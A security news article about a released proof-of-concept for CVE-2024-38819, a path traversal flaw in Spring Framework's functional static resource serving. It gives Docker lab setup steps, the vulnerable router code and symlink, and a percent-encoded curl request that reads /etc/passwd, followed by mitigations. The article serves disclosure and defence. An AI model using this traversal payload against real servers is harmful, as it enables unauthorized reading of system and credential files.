Spring Framework Path Traversal Vulnerability (CVE-2024-38819) PoC Exploit Released

A Proof of Concept (PoC) exploit for the critical path traversal vulnerability identified as CVE-2024-38819 in the Spring Framework has been released, shedding light on a serious security issue affecting applications that serve static resources via functional web frameworks.

This vulnerability allows attackers to access unauthorized files on the server through carefully crafted HTTP requests.

The CVE-2024-38819 vulnerability impacts applications using the Spring Framework’s WebMvc.fn or WebFlux.fn for serving static resources.

Specifically, the issue lies in the improper handling of file paths, which enables attackers to perform directory traversal to access unauthorized files, including sensitive system files such as /etc/passwd.

Free Webinar on Best Practices for API vulnerability & Penetration Testing:  Free Registration

Proof of Concept (PoC) Details

The released PoC demonstrates how an attacker can exploit the vulnerability to extract sensitive file contents on a vulnerable server. Below are the steps provided to replicate the exploit.

Steps to Execute PoC

Set Up the Vulnerable Environment

Use Spring Boot 3.3.4, which depends on Spring Framework 6.1.13 (one of the affected versions).

Build a Docker image containing the vulnerable setup using the following command:
bash cd vuln docker build -t cve-2024-38819-poc .

Run the Vulnerable Container

Start the container and expose port 8080 to the host machine:
bash docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc

Execute the Exploit

Run the following curl command to send a malicious HTTP request that exploits the vulnerability:

bash curl http://localhost:8080/static/link/%2e%2e/etc/passwd

If the vulnerability is present, the contents of the /etc/passwd file will be displayed, indicating a successful attack.

Technical Explanation

The vulnerability arises from the following setup in the vulnerable application:

Static Resource Routing

The static resources are served using RouterFunctions and FileSystemResource in the application.

Example code:

java public RouterFunction<ServerResponse> staticResourceRouter() { return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/")); }

Symbolic Link Exploitation

A symbolic link is created in the Dockerfile to reference a static directory:
bash RUN ln -s /static /app/static/link

Payload for Directory Traversal

An attacker can exploit the symbolic link and traverse directories by using percent-encoded paths like:
/static/link/%2e%2e/etc/passwd%2e%2e is the URL-encoded representation of .. (parent directory), enabling directory traversal.

Mitigation and Recommendations

To mitigate this vulnerability:

1. Upgrade to Patched Versions :Spring Framework users should upgrade to non-affected versions once the vulnerability is patched.
2. Restrict File Access: Avoid symbolic links for static resources and implement strict validation of file paths.
3. Monitor and Patch Systems: Regularly scan and patch vulnerable systems to reduce the risk of exploitation.

Disclaimer

This PoC is released for educational purposes and to raise awareness of the vulnerability. Before testing or utilizing this PoC in any environment, ensure you have proper authorization and the environment is secured. Misusing this PoC may result in legal and ethical repercussions.

This vulnerability appears to be a continuation of similar issues identified in Spring Framework, such as CVE-2024-38816, but involves a different attack vector. Organizations relying on the Spring Framework for critical applications are urged to evaluate and secure their implementations promptly.

Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free